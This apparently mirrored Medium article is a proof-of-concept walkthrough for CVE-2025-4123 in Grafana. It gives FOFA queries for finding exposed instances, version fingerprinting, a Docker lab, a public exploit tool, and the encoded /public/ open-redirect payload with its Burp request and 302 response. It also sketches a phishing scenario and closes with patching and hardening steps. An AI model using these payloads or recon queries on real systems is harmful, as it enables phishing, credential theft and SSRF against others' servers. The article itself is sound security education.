R·D Intel

CVE-2025–4123 Grafana Open Redirect & SSRF — Full PoC — CVSS 7.6 HIGH | by Dharanis - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original CVE-2025–4123 Grafana Open Redirect & SSRF — Full PoC — CVSS 7.6 HIGH Client-Side Path Traversal in /public/ · No Auth Required · Grafana < 12.0.0 Dharanis Follow ~5 min read · March 26, 2026 (Updated: March 26, 2026) · Free: Yes 01 Overview What is CVE-2025–4123? CVE-2025–4123 is a high-severity vulnerability affecting Grafana — the industry-standard open-source observability platform deployed across millions of engineering stacks worldwide. Discovered by security researcher Alvaro Balada via Grafana's bug bounty program on April 26, 2025, it was publicly disclosed on May 21, 2025. The root cause is a client-side path traversal flaw in Grafana's /public/ static file handler. By crafting a single malformed URL with encoded path separators, an attacker can escape the intended directory scope and trigger three distinct attack primitives — all without any authentication. Open Redirect Redirect victims to any external domain via a crafted Grafana URL. Trusted domain abused for phishing — no login needed. Full-Read SSRF Reach internal cloud metadata services (169.254.169.254) and internal APIs when the Grafana Image Renderer plugin is installed. Stored XSS Execute arbitrary JavaScript in a victim's browser when anonymous access is enabled — a common config for public dashboards. // CVE-2025–4123 — full details table from official disclosure 02 Reconnaissance Finding Grafana Instances with FOFA FOFA is a cyberspace mapping engine widely used by bug bounty hunters and red teamers for asset discovery. Grafana exposes a unique favicon with a known hash — making it trivially fingerprinted across the internet regardless of URL structure or port number. FOFA Queries # Find ALL Grafana instances globally app="Grafana" # Target a specific bug bounty scope domain="example.com" && icon_hash="2123863676" OR Host="example.com" && icon_hash="2123863676" // FOFA query targeting a specific domain with Grafana favicon hash Version Fingerprinting (No Auth Required) Before sending any payload, confirm the Grafana version. The /api/health endpoint returns the exact build version with zero authentication: curl http://TARGET:3000/api/health # Response: { "commit": "03f502a94d17f7dc4e6c34acdf8428aedd986e4c", "database": "ok", "version": "10.4.0" ← VULNERABLE (< 12.0.0-security-01) } // /api/health leaking exact version — version 10.4.0 confirmed vulnerable Version RangeStatus All 10.x < 10.4.14VULNERABLE All 11.x < backport patchVULNERABLE 12.0.0 (GA release)VULNERABLE >= 12.0.0-security-01PATCHED ✓ 03 Lab Setup Spinning Up a Vulnerable Lab with Docker All testing was performed on Kali Linux using a locally containerized Grafana 10.4.0 instance — fully isolated and reproducible. Step 1 — Clone Exploit Tool # Clone the PoC tool git clone https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana- cd CVE-2025-4123-Exploit-Tool-Grafana- # Install Python dependency pip install requests Step 2 — Launch Vulnerable Grafana Container # Pull and run Grafana 10.4.0 (vulnerable) docker run -d -p 3000:3000 grafana/grafana:10.4.0 # Verify it's live curl http://127.0.0.1:3000/api/health // Docker pulling grafana:10.4.0 — ~110MB across 7 layers, container on port 3000 04 Exploitation Three Methods to Trigger the Vulnerability ⚠ Responsible Disclosure All testing was conducted in an isolated local lab environment against a self-hosted container. Never test against production systems without explicit written authorization. Method 1 — exploit.py Interactive Mode Run the exploit tool against the local Grafana instance. It supports SSRF, LFI, and Open Redirect modes: python3 cve_2025_4123_exploit_mitsec.py -u http://127.0.0.1:3000 For Open Redirect targeting google.com, the tool generates this crafted payload URL: http://127.0.0.1:3000/public/..%2F%5cgoogle.com%2F%3f%2F..%2F.. The key trick here is the path traversal sequence using ..%2F (URL-encoded ../ ) combined with %5c (backslash) to escape the /public/ directory scope. Grafana's static file handler follows the redirect without validating the final destination. Method 2 — Burp Suite Repeater Manually sending the payload in Burp Suite confirms the raw HTTP behavior — a clean 302 Found response: Burp Suite Repeater: 302 Found, Location: /\google.com/?/../.. GET /public/..%2F%5cgoogle.com%2F%3f%2F..%2F.. HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 Accept: */* Connection: close --- HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Location: /\google.com/?/../.. Date: Mon, 09 Mar 2026 11:45:41 GMT Content-Length: 44 Found. // Burp Suite Repeater confirming 302 → Location: /\google.com/?/../.. Method 3 — Browser Open Redirect (Live Demo) When a victim clicks a crafted link or it loads inside a phishing iframe, their browser follows the 302 from the trusted Grafana domain — silently navigating to the attacker's site: # Victim sees this URL (looks like a legitimate Grafana link): http://grafana.company.com/public/..%2F%5Cgoogle.com%2F%3F%2F..%2F.. # Browser ends up at: https://google.com/?/../.. ← or any attacker-controlled domain // Browser OPEN REDIRECT CONFIRMED — Google.com loaded directly from the Grafana URL Browser OPEN REDIRECT CONFIRMED: Google.com loaded from Grafana URL 05 Impact Why This Matters at Scale Grafana sits at the center of modern observability stacks — connected to Prometheus, databases, cloud accounts, CI/CD pipelines, and on-call systems. Compromise of Grafana frequently means access to every credential and data source it manages. // Impact matrix and CVSS 7.6 High scoring breakdown 🔴 Critical Attack Scenario Attacker sends a phishing email with a link to grafana.company.com/public/..%2F%5Cattacker.com... — the target sees a legitimate company domain in the URL, clicks it, and lands on a credential-harvesting page. The open redirect requires zero auth and works on any vulnerable instance regardless of Grafana's authentication settings. Attack ModeImpactPrerequisite Open Redirect Phishing, credential theft, session hijacking None — works universally SSRF AWS/GCP/Azure IAM credentials, internal API access Image Renderer plugin installed LFI Read server-side files (config, keys, .env) Specific endpoint configuration XSS Arbitrary JS execution in victim's browser Anonymous access enabled 06 Remediation How to Fix This Immediately 1 Upgrade Grafana to the patched version The only complete fix is upgrading. All versions below the security patch remain vulnerable. 2 Pull the security release via Docker docker pull grafana/grafana:12.0.0-security-01 docker stop grafana docker run -d -p 3000:3000 grafana/grafana:12.0.0-security-01 # Verify patch curl http://localhost:3000/api/health | grep version # Must show >= 12.0.0-security-01 3 Check your version track for the minimum safe version Grafana TrackMinimum Safe Version 12.x 12.0.0-security-01 or 12.0.1+ 11.x 11.6.1, 11.5.4, 11.4.3, 11.3.4, 11.2.8, 11.1.11, 11.0.11 10.x 10.4.14, 10.3.18 9.x / 8.xEnd of Life — upgrade required Temporary Hardening While patching, consider placing Grafana behind a reverse proxy that strips or blocks requests containing %5c , %2F..%2F , or backslash sequences in the /public/ path. Also audit whether anonymous access is truly needed — disabling it removes the XSS vector. References ▶ Exploit Tool: https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana- ▶ Official Grafana Advisory: https://grafana.com/blog/grafana-security-release-high-severity security-fix-for-cve-2025–4123/ ▶ Grafana Security Advisory: https://grafana.com/security/security-advisories/cve-2025-4123/ ▶ NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-4123 ▶ IONIX Analysis: https://www.ionix.io/blog/grafana-cve-2025-4123-open-redirect-stored-xss patch/ ▶ ProjectDiscovery Nuclei Template: https://cloud.projectdiscovery.io/library/CVE-2025-4123 ▶ CVSS: 7.6 High — Discovered by Alvaro Balada — Disclosed: May 21, 2025 #ssrf #grafana #vapt #cybersecurity #bug-bounty Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).